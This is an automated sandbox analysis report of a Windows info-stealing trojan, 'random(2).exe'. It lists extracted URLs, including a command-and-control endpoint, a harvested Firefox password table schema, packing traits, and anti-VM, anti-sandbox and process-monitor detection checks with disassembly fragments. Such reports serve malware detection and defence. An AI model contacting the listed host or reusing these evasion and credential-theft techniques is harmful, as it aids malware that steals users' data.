                Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542364026.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557258128.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558684542.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567247573.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: random(2).exe, 00000000.00000003.1567247573.0000000005AE1000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1365385074.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/a
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/a$
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1547145549.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546935640.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1547103339.0000000001213000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557428973.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/api
                Source: random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/api288
                Source: random(2).exe, 00000000.00000003.1582541164.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apiEM
                Source: random(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apiV
                Source: random(2).exe, 00000000.00000003.1309813518.00000000011B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apic
                Source: random(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557428973.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apij
                Source: random(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557428973.0000000001215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apime
                Source: random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apix
                Source: random(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/apiy
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/b
                Source: random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today/m
                Source: random(2).exeString found in binary or memory: https://earthsymphzony.today:443/api
                Source: random(2).exe, 00000000.00000003.1567432553.0000000001232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://earthsymphzony.today:443/api&
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542364026.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://support.mozilla.org
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: random(2).exe, 00000000.00000003.1377768758.0000000005C00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
                Source: random(2).exe, 00000000.00000003.1547185152.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/3&
                Source: random(2).exe, 00000000.00000003.1309766072.0000000001207000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1310008327.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: random(2).exe, 00000000.00000003.1309766072.0000000001207000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1310008327.00000000011CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557258128.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558684542.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567247573.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source
                Source: random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: random(2).exe, 00000000.00000003.1377768758.0000000005C00000.00000004.00000800.00020000.00000000.sdmp, CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: random(2).exe, 00000000.00000003.1377768758.0000000005C00000.00000004.00000800.00020000.00000000.sdmp, CAB34A9C016C4162.dat.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49834 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49844 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49857 version: TLS 1.2

                System Summary

                barindex
                PE file contains section with special chars
                Source: random(2).exeStatic PE information: section name:
                Source: random(2).exeStatic PE information: section name: .idata
                Source: random(2).exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011DA6490_3_011DA649
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011D3D6E0_3_011D3D6E
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011AE25C0_3_011AE25C
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011AE2430_3_011AE243
                Source: random(2).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: random(2).exeStatic PE information: Section: ZLIB complexity 0.999706737987988
                Source: random(2).exeStatic PE information: Section: cnerjxoh ZLIB complexity 0.994536225341721
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/12@9/1
                Source: C:\Users\user\Desktop\random(2).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: random(2).exe, 00000000.00000003.1354339352.0000000005B17000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341253608.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1354116413.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1337301138.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1338136673.0000000005B17000.00000004.00000800.00020000.00000000.sdmp, E8404DBFAF5F23C4.dat.0.dr, A5D70FE1DD113C55.dat.0.dr, BD860E4BC5A83783.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: random(2).exeVirustotal: Detection: 56%
                Source: random(2).exeReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\random(2).exeFile read: C:\Users\user\Desktop\random(2).exeJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: random(2).exeStatic file information: File size 1835008 > 1048576
                Source: random(2).exeStatic PE information: Raw size of cnerjxoh is bigger than: 0x100000 < 0x192600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\random(2).exeUnpacked PE file: 0.2.random(2).exe.5e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cnerjxoh:EW;ebptfdwj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cnerjxoh:EW;ebptfdwj:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: random(2).exeStatic PE information: real checksum: 0x1c825f should be: 0x1c1781
                Source: random(2).exeStatic PE information: section name:
                Source: random(2).exeStatic PE information: section name: .idata
                Source: random(2).exeStatic PE information: section name:
                Source: random(2).exeStatic PE information: section name: cnerjxoh
                Source: random(2).exeStatic PE information: section name: ebptfdwj
                Source: random(2).exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011D1B66 push esi; iretd 0_3_011D1B69
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011D1B86 push ss; retf 0_3_011D1B8D
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011D1B80 push eax; retf 0_3_011D1B85
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_0119E963 pushad ; iretd 0_3_0119E969
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011AC31E push eax; ret 0_3_011AC349
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011AC25C pushad ; ret 0_3_011AC355
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011AE25C push eax; iretd 0_3_011AE4EC
                Source: C:\Users\user\Desktop\random(2).exeCode function: 0_3_011AE243 push eax; iretd 0_3_011AE4EC
                Source: random(2).exeStatic PE information: section name: entropy: 7.977249264089444
                Source: random(2).exeStatic PE information: section name: cnerjxoh entropy: 7.954038506762716

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\random(2).exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\random(2).exeSystem information queried: FirmwareTableInformationJump to behavior
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\random(2).exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\random(2).exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B5396 second address: 7B539F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B539F second address: 7B53A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B53A7 second address: 7B53DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F83146B40CCh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jg 00007F83146B40DCh 0x00000013 jmp 00007F83146B40D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B53DD second address: 7B53E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B57F9 second address: 7B5808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F83146B40C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B5A61 second address: 7B5A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8314EA918Fh 0x00000009 jp 00007F8314EA9186h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B5A7C second address: 7B5A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007F83146B40C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B5BC1 second address: 7B5BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jg 00007F8314EA9186h 0x0000000c pop ebx 0x0000000d popad 0x0000000e js 00007F8314EA91B0h 0x00000014 push eax 0x00000015 jmp 00007F8314EA9198h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B83F2 second address: 7B845E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F83146B40C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F83146B40D8h 0x0000000f popad 0x00000010 nop 0x00000011 stc 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 mov dword ptr [ebp+122D28D7h], ecx 0x0000001b pop ecx 0x0000001c call 00007F83146B40C9h 0x00000021 jmp 00007F83146B40D9h 0x00000026 push eax 0x00000027 push eax 0x00000028 jg 00007F83146B40C8h 0x0000002e pop eax 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push edx 0x00000037 pop edx 0x00000038 jne 00007F83146B40C6h 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B845E second address: 7B8482 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8314EA9198h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8482 second address: 7B8486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B8486 second address: 7B848C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B848C second address: 7B8491 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 7B85B9 second address: 7B85C3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8314EA9186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
